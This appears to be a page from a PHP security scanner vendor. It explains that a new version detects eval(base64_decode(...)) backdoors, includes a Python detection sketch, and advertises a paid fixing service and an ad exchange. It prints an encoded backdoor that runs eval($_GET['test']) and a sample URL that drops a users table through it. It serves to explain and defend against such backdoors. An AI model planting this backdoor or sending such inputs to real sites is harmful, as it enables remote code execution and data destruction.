The scanner checks the input data received from the user and analyzes how that data behaves in the code. It analyzes all functions to determine their degree of danger or safety, and that result is used in the further analysis of the code. It is therefore very important to download the entire site (project) as a whole rather than separate modules, since modules use functions that are described elsewhere. Otherwise, the scan report may be erroneous. Starting with version 0.6.0, the scanner analyzes hidden code generated with the base64_encode function and used in conjunction with eval(base64_decode());. An example follows.
The simplest code that an attacker can keep in a template or in some module is as follows:
eval(base64_decode("JF9HRVRbJ3Rlc3QnXQ=="));
And it is quite enough to get full access to the site and the database. Why is that? It is simple, but not noticeable because of base64_decode. The base64_decode function decodes what the base64_encode function encodes. Therefore, this seemingly harmless code: eval(base64_decode("JF9HRVRbJ3Rlc3QnXQ=="));
turns into this:
eval($_GET['test']);
That is, everything passed via GET in the test parameter, for example:
http://site.ru/?test=mysql_query('DROP TABLE users');
will be executed.
In this case, the users table will be deleted. It is difficult to imagine a more terrible security hole. Starting with version 0.6.0, however, the scanner catches such code. We therefore recommend checking your site again if you have already done so. If this line or a similar one is found on your site, simply remove it. If you are unsure, please contact us on the site, and we will help you correct the error.
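A minimal sketch of the kind of check described above, as an added example that is not the scanner's own code: it finds eval(base64_decode("...")) calls in PHP source, decodes the literal, and flags decoded code that reads request superglobals. The names scan_php, decode_literal and SAMPLE are assumptions made for this illustration.

```python
import base64
import binascii
import re

# eval ( base64_decode ( "<literal>" ) ) with optional whitespace, either quote style
EVAL_B64 = re.compile(
    r"""\beval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]*)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
# Request-controlled PHP superglobals: decoded code touching these is the worst case
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")


def decode_literal(literal):
    """Decode a base64 string literal; return None if it is not valid base64."""
    # Whitespace inside the literal is dropped before decoding, so a padded
    # or line-wrapped string is still recognised.
    compact = re.sub(r"\s+", "", literal)
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_php(source):
    """Return one finding per eval(base64_decode("...")) call in PHP source."""
    findings = []
    for m in EVAL_B64.finditer(source):
        decoded = decode_literal(m.group(2))
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,  # None means the literal could not be decoded
            "user_input": bool(decoded and USER_INPUT.search(decoded)),
        })
    return findings


# Constructed sample template; line 3 holds the string shown in the article
SAMPLE = """<?php
echo "header";
eval (base64_decode ("JF9HRVRbJ3Rlc3QnXQ =="));
echo base64_decode("aGVsbG8=");
"""

if __name__ == "__main__":
    for finding in scan_php(SAMPLE):
        print(finding)
```

A plain base64_decode call without eval, such as the last line of the sample, is not reported.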
In addition, gaps in the tips have been fixed in version 0.6.0. By clicking the “Help” button after scanning, you will get tips on how to fix a given error in the code. If you are not sure of your own ability to remove vulnerabilities, please contact us, and we will correct everything for a low fee.
We provide webmasters with the opportunity to advertise their projects using the advertising exchange system we designed. In our system, for every ad unit you have shown, which is as follows:
Your ad will be shown up to 5 times in the same ad unit! Why "up to"? It is a temporary inconvenience until a dozen sites are connected to our system. After you register and log in on this page, our system interface will be available to you. It allows you to create ad units, see the list of sites connected to the system, and view detailed statistics on the current state of impressions and clicks on your advertisement, both per unit and by visitors of your ads. You can also transfer the balance of current hits from one ad unit to another, which makes it possible to promote young projects at the expense of already advanced ones. If you have any offers or suggestions for the development of the system, you can leave them in our forum.
I wish you fewer problems with your project security!